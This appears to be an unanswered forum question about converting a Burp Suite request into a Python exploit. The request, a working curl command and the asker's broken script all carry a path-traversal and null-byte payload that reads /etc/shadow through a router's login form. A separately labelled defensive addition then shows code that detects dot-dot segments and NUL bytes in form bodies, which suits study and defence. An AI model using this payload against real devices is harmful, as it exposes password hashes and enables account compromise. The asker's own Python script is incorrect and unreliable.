
So I am trying to write a basic Python exploit for a basic Burp request, but I can't figure it out.

My request is:

POST /index.php HTTP/1.1
Host: <ip>:<port>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://<ip>:<port>/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=

Then I tried executing the following script, but I don't get the same output as Burp Suite.

import requests

choice = raw_input("Select your ip: ")
port = raw_input("Select your port: ")

payload = {'USERDBDomains.Domainname' : 'geardomain&USERDBUsers.UserName', 'USERDBUsers.Password' : '', 'thispage' : '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm', 'button.login.USERDBUsers.router_status' : 'button.login.USERDBUsers.router_status%3dLogin', 'Login.userAgent' : ''}
headers = {'POST' : '/index.php HTTP/1.1', 'Host' : '<ip>:<port>', 'Accept' : '*/*', 'Accept-Language' : 'en', 'User-Agent' : 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0', 'Connection' : 'close', 'Referer' : 'https://<ip>:<port>/index.php', 'Content-Type' : 'application/x-www-form-urlencoded', 'Content-Length' : '201'}

url = "https://{}:{}/index.php".format(<ip> , <port>)

r = requests.get(url, params=payload, headers=headers, verify=False)

print r.status_code

print r.headers

print r.content

The curl exploit is:

curl -i -s -k  -X $'POST' \
    -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Referer: https://<ip>:<port>/index.php' -H $'Content-Type: application/x-www-form-urlencoded' \
    --data-binary $'USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=' \
    $'https://<ip>:<port>/index.php'

0 answers
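From the receiving side, the request body quoted in the question carries two signals a server or WAF can check before a form field is used as a file name: a `..` path segment and a NUL byte after percent-decoding. The following is an added example, not part of the original post; the function names, the decode bound, the benign body and the double-encoded body are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl, unquote

MAX_DECODE_ROUNDS = 3  # assumption: bound on nested percent-encoding we unwrap

def fully_decode(value):
    """Percent-decode repeatedly (bounded) so double-encoded input is seen too."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_form_body(body):
    """Return (field, reason) findings for an x-www-form-urlencoded body."""
    findings = []
    # keep_blank_values: empty fields such as USERDBUsers.UserName= stay visible
    for name, value in parse_qsl(body, keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl already decoded one layer
        segments = value.replace("\\", "/").split("/")
        if "\x00" in value:
            # a NUL can truncate the name in C-backed file APIs (drops "index.htm")
            findings.append((name, "nul-byte"))
        if ".." in segments:
            findings.append((name, "dot-dot-segment"))
    return findings

# Body as quoted in the question (16 encoded "../" steps, then the file name).
PAGE_BODY = (
    "USERDBDomains.Domainname=geardomain&USERDBUsers.UserName="
    "&USERDBUsers.Password=&thispage=" + "..%2f" * 16 + "etc%2fshadow%00index.htm"
    "&button.login.USERDBUsers.router_status="
    "button.login.USERDBUsers.router_status%3dLogin&Login.userAgent="
)
# Constructed samples: a normal login and a double-encoded variant.
BENIGN_BODY = (
    "USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=admin"
    "&USERDBUsers.Password=example&thispage=index.htm&Login.userAgent="
)
DOUBLE_ENCODED_BODY = "thispage=..%252f..%252fetc%252fpasswd"

if __name__ == "__main__":
    for label, body in [("page", PAGE_BODY), ("benign", BENIGN_BODY),
                        ("double-encoded", DOUBLE_ENCODED_BODY)]:
        print(label, inspect_form_body(body))
```

A check like this belongs next to, not instead of, resolving the requested page against a fixed allow-list of template names.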